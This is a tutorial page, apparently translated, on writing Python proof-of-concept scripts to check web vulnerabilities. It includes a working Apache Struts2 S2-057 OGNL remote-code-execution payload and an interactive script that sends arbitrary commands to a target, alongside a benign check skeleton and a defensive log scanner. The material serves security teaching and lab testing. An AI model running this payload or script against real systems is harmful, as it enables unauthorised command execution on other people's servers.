2025-02-28 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article explains how to write a PoC in Python to verify a program vulnerability. The explanation is simple and clear and easy to follow; work through it with the editor to learn how to use a PoC to verify program vulnerabilities in Python.
01 What is a PoC
PoC (full name: Proof of Concept) literally means "proof of concept". In the security world you can think of it as a vulnerability verifier. Compared with a full application, a PoC is an incomplete program: just a piece of code that proves the presenter's point.
02 What is an Exp
Exp (full name: Exploit) is a vulnerability exploitation program: a program that turns a vulnerability into value. Imagine a scenario where the target has a SQL injection vulnerability and you know about it, and you write a program that uses this SQL injection vulnerability to obtain the target's permissions; that program is the so-called Exp. Of course, if you do not use the vulnerability and just leave it there, it can be considered worthless to you.
03 Two misunderstandings about PoC/Exp
1. Must a PoC be written in Python? A PoC exists for only one purpose: to prove that a vulnerability exists. As for the form of the PoC or how the code is implemented, you can use whatever language you like. Python is recommended because it is easy to write and easy to read.
2. Is a PoC an Exp? Strictly speaking, PoC and Exp are two different things. A PoC proves that a vulnerability exists; an Exp uses the vulnerability to attack further. In many cases you know a vulnerability exists but do not know how to exploit it: writing a PoC is very easy, while writing an Exp is difficult.
An analogy:
A PoC is like knowing that there is a problem with your door lock without breaking in, while an Exp knows there is a problem with your door lock and goes further, using it to commit illegal acts such as theft.
04 PoC authoring process
For a known public vulnerability, the writing process is roughly divided into the following steps:
1. Check the vulnerability details and determine the affected scope. Once you have the details, download an affected version from the official website or look for an existing docker file on GitHub.
2. Build the vulnerability environment with a virtual machine, docker, or phpstudy. Those who can may build it on the cloud. (docker is recommended: building the environment by hand produces errors and wastes time, while the existing docker files were written by experts after reproducing the vulnerability.)
3. Reproduce the vulnerability according to its details and follow the process to detect its existence, paying special attention to the parameters, commands, functions and the corresponding submission methods. Roughly understand the principle of the vulnerability and the exploitation process, and confirm whether the vulnerability exists.
4. Write the PoC. After the vulnerability is reproduced, start writing the PoC: send a simple request to check whether the vulnerability exists, then filter the page response with a regular expression or lxml to extract the desired result.
5. Test the PoC against the built environment. Verify the existence of the vulnerability while writing, and test every modification until it achieves the desired effect.
05 Some libraries involved in writing a PoC
urllib provides modules for operating on URLs and is often needed when fetching web pages:
urllib.request -- opens and reads URLs
urllib.error -- contains the exceptions raised by urllib.request
urllib.parse -- parses URLs
requests is an easy-to-use HTTP library, more concise than urllib:
requests.get(url, headers=headers, data=data, verify=False, proxies=proxy, timeout=10)
url -- the URL of the request
headers -- request headers constructed for the request
data -- data carried with the request
verify -- verify=False disables TLS certificate verification (and its https warning)
proxies -- proxy settings
timeout -- request response timeout handling
re is the regular expression module; it uses concise character expressions to match the desired result in a string.
When using regular syntax, it is recommended to copy the response source into an online regex tester to build the expression.
Online regex testing: https://www.yisu.com/tools/zhengze.htm
json converts Python data into JSON format and JSON data back into Python data. Two methods:
json.dumps -- encodes a Python object into a JSON string
json.loads -- decodes a JSON string into a Python object
lxml is a parser for XML and HTML; its main function is to parse and extract data from XML and HTML and to locate specific elements and nodes.
lxml locates element nodes with XPath syntax:

    from lxml import etree
    html = etree.HTML(response.text)
    result = html.xpath('xpath statement')  # fill in the XPath expression
    print(result)
optparse is the command line parameter module. Parameters such as -h (--help) and -u (--url), often seen in PoCs, come from this module.

    import optparse
    parse = optparse.OptionParser()  # create the OptionParser object after importing
    parse.add_option('-u', '--url', dest='url', help='target url')  # add the required parameters and their descriptions
    parse.set_defaults(v=1.2)  # you can also set default values
    options, args = parse.parse_args()
base64 encodes and decodes strings with base64:
base64.b64encode() -- encoding function
base64.b64decode() -- decoding function
multiprocessing: multiple processes can reduce processing time when handling a large number of requests. (Python's multithreading is "fake": because of the GIL, threads do not run in parallel but serially.)

    from multiprocessing import Process

    def Poc(i):
        ...  # PoC logic goes here

    if __name__ == '__main__':
        workers = []
        for i in range(5):
            p = Process(target=Poc, args=(str(i),))  # args must be a tuple
            p.start()
            workers.append(p)
        for p in workers:  # join after all have started, otherwise they run one at a time
            p.join()

06 Basic method for writing a web vulnerability PoC

    import requests
    import re
    from requests.packages.urllib3.exceptions import InsecureRequestWarning

    def Poc(url):
        target_url = url + 'payload'  # URL used to verify the vulnerability
        # proxy pool settings
        proxy = {'http': '127.0.0.1:812', 'https': '127.0.0.1:8123'}
        # request header construction
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36',  # simulate a browser request
            'cookie': 'xxxxxxxxxxxxxx',  # some requests need a cookie to return the desired content
            'Connection': 'close',  # close redundant connections
        }
        data = {'name': 'xxxx', 'value': 'xxxx'}  # data carried with the request
        # use try/except to handle exceptions
        try:
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # silence the SSL verification warning
            response = requests.get(url=target_url, headers=headers, data=data, verify=False, proxies=proxy, timeout=10)  # request the vulnerable URL
            if response.status_code == 200:
                result = re.search(r'(REGEX_FOR_THE_VULNERABLE_RESPONSE)', response.text, re.I)  # match the page with a regex; fill in the rule
                if result:
                    print('getting results: {}'.format(result.group(1)))
                else:
                    print('no match in the response')
            else:
                print('request failed: {}'.format(response.status_code))
        except Exception as e:
            print('request failed: {}'.format(e))

    if __name__ == '__main__':
        url = str(input('Please enter the URL to detect: '))
        Poc(url)

07 Practical vulnerability PoC
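The template above leaves the request, the decision and the command-line handling tangled in one function. The following is an added example, not the article's code, that carries the procedure of sections 04 to 06 through in a testable shape using only the standard-library modules listed in section 05 (urllib, re, json, optparse): one benign fingerprint request, a pure decision function that can be unit-tested without a network, and a local fixture server so the script runs offline. The /about path, the "ExampleApp" banner and VULN_PATTERN are constructed for the demo and stand in for whatever a real vulnerability check would send and match.

```python
"""PoC skeleton: one benign request, one decision, JSON output.

Added example, not the article's code. Assumed/constructed: the /about path,
the ExampleApp banner, VULN_PATTERN and the local fixture server.
"""
import json
import optparse
import re
import ssl
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

CHECK_PATH = "/about"  # hypothetical path that exposes a version banner
# Constructed signature: versions 1.0.x to 1.2.x are treated as affected
VULN_PATTERN = re.compile(r"ExampleApp/(1\.[0-2]\.\d+)", re.I)


def fetch(url, timeout=10, insecure=False):
    """Send one GET; return (status, headers, body). HTTP errors are returned, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "poc-check/1.0", "Connection": "close"})
    ctx = None
    if insecure:  # equivalent of requests' verify=False
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers), e.read().decode("utf-8", "replace")


def evaluate(status, body):
    """Pure decision logic, separated so it can be tested without a target."""
    if status != 200:
        return {"vulnerable": False, "reason": f"status {status}"}
    m = VULN_PATTERN.search(body)
    if not m:
        return {"vulnerable": False, "reason": "banner not matched"}
    return {"vulnerable": True, "version": m.group(1)}


def check(base_url, timeout=10, insecure=False):
    """Full PoC: build the verification URL, request it, decide, report."""
    target = urllib.parse.urljoin(base_url, CHECK_PATH)
    status, _headers, body = fetch(target, timeout, insecure)
    result = evaluate(status, body)
    result["target"] = target
    return result


# --- constructed fixture so the script runs offline --------------------------
class _Fixture(BaseHTTPRequestHandler):
    banner = "ExampleApp/1.1.4"  # constructed: matches VULN_PATTERN

    def do_GET(self):
        body = f"<html>Powered by {self.banner}</html>".encode()
        self.send_response(200 if self.path == CHECK_PATH else 404)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_fixture():
    """Start a local HTTP server on a random port and return its base URL."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _Fixture)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}/"


def main(argv=None):
    parser = optparse.OptionParser(usage="%prog -u URL [--timeout N] [--insecure]")
    parser.add_option("-u", "--url", dest="url", help="target base url (default: local fixture)")
    parser.add_option("--timeout", dest="timeout", type="int", default=10)
    parser.add_option("--insecure", dest="insecure", action="store_true", default=False,
                      help="skip TLS certificate verification")
    opts, _ = parser.parse_args(argv)
    base = opts.url or start_fixture()
    print(json.dumps(check(base, opts.timeout, opts.insecure), indent=2))


if __name__ == "__main__":
    main()
```

Run it with no arguments to exercise the flow against the built-in fixture, or with -u to point it at a lab environment built as in section 04. Keeping evaluate() free of network code is the point of the structure: every change to the regex can be tested against saved responses before touching the target, which is the "test every modification" step of the writing process.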
Here the Struts2 S2-057 vulnerability is used to test vulnerability deployment with docker.
Start the environment: docker-compose up -d
Visit: http://192.168.11.124:8080/struts2-showcase/
First reproduce the vulnerability, and understand every step of the reproduction.
Then write a PoC test to verify that the vulnerability exists:
PoC: /struts2-showcase/$%7B233*233%7D/actionChain1.action
http://192.168.11.124:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action
After accessing the link, the $%7B233*233%7D in the URL is evaluated to 54289 (233*233), indicating that the vulnerability exists.
It can then be verified again with the existing vulnerability PoC (Exp).
Note: the PoC here needs to be URL encoded.
PoC (Exp): ${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
Reproduction of the vulnerability is basically complete; now we write the PoC.

    import requests
    import sys

    def title():
        print('+' + '-' * 30 + '+')
        print('Version: Struts S2-057')
        print('author: Tackrio')
        print('use: exploit.py url')
        print('+' + '-' * 30 + '+')

    def Poc(url):
        try:
            while True:
                cmd = input('$ ')
                payload_command = ('/struts2/%24%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).'
                                   '(%23ct%3D%23request%5B%27struts.valueStack%27%5D.context).'
                                   '(%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D).'
                                   '(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).'
                                   '(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).'
                                   '(%23ct.setMemberAccess(%23dm)).'
                                   '(%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27' + cmd + '%27)).'
                                   '(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action')
                payload_test = '/struts2-showcase/$%7B1+1%7D/actionChain1.action'  # benign check: ${1+1} evaluates to 2
                response_test = requests.get(url=url + payload_test, allow_redirects=False, verify=False, timeout=6)
                content = response_test.headers.get('Location').split('/')[2]
                if cmd == 'exit':
                    exit()
                if response_test.status_code == 302 and content == '2':  # expression was evaluated, so the target is vulnerable
                    url1 = url + payload_command
                    response = requests.get(url=url1, allow_redirects=False, verify=False, timeout=6)
                    print(response.headers.get('Location').split('/')[2])
        except requests.ConnectionError as error:
            print("request error:", error)

    if __name__ == "__main__":
        title()
        args = sys.argv[1]
        Poc(url=args)
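The verification above works because Struts evaluates an OGNL expression placed in the URL namespace and echoes the result in a 302 Location header. The same fact gives the defender a reliable signal: a namespace segment should never contain an OGNL opener. The following is an added example, not the article's code, that scans web server access logs for S2-057-style probes, decodes the path (twice, since probes are often double-encoded), and rates a request higher when it carries the member-access and Runtime tokens seen in the public payload. The log lines and the Combined-format request-line regex are constructed for this demo.

```python
"""Detect S2-057-style OGNL probes in web server access logs.

Added example, not the article's code. The log lines are constructed and the
log format is assumed to be NCSA/Combined ("METHOD PATH HTTP/x.y" STATUS).
"""
import re
from urllib.parse import unquote

# One request line per log entry: "<method> <path> HTTP/x.y" <status>
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# OGNL expression openers; in S2-057 they are injected into the URL namespace
OGNL_OPENERS = ("${", "%{")
# Tokens from the public payload that indicate an attempt to execute commands
EXEC_TOKENS = ("@java.lang.Runtime", "getRuntime", "DEFAULT_MEMBER_ACCESS", ".exec(")


def classify_path(raw_path):
    """Return None for a benign path, or a finding dict for an OGNL probe."""
    path = unquote(unquote(raw_path))  # decode twice: probes are often double-encoded
    if ".action" not in path:           # S2-057 needs a Struts action in the path
        return None
    if not any(opener in path for opener in OGNL_OPENERS):
        return None
    severity = "high" if any(tok in path for tok in EXEC_TOKENS) else "medium"
    return {"path": path, "severity": severity}


def scan(lines):
    """Run classify_path over every parsable log line and collect findings."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        finding = classify_path(m.group("path"))
        if finding:
            finding["status"] = int(m.group("status"))
            # A 302 means Struts processed the namespace (and echoes the evaluated
            # expression in Location); any other status means it was rejected early.
            finding["processed"] = finding["status"] == 302
            findings.append(finding)
    return findings


# Constructed log lines (not real traffic)
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2021:10:00:01 +0000] "GET /struts2-showcase/showcase.action HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jun/2021:10:00:07 +0000] "GET /struts2-showcase/$%7B233*233%7D/actionChain1.action HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jun/2021:10:00:09 +0000] "GET /struts2-showcase/%24%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS)%7D/actionChain1.action HTTP/1.1" 302 0',
    '10.0.0.5 - - [01/Jun/2021:10:00:12 +0000] "GET /static/logo.png HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] status={f['status']} processed={f['processed']} {f['path']}")
```

The arithmetic probe from the walkthrough is reported as medium with processed=True, which is exactly the "54289 came back" condition from the defender's side; the mitigation remains upgrading Struts and keeping alwaysSelectFullNamespace disabled with explicit namespaces in the action configuration, with the log finding serving as the trigger to check both.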
Thank you for reading. The above is the content of "how to use a PoC to verify program vulnerabilities in Python". After studying this article, I believe you have a deeper understanding of the topic; the specific usage still needs to be verified in practice. The editor will push more related articles for you; welcome to follow!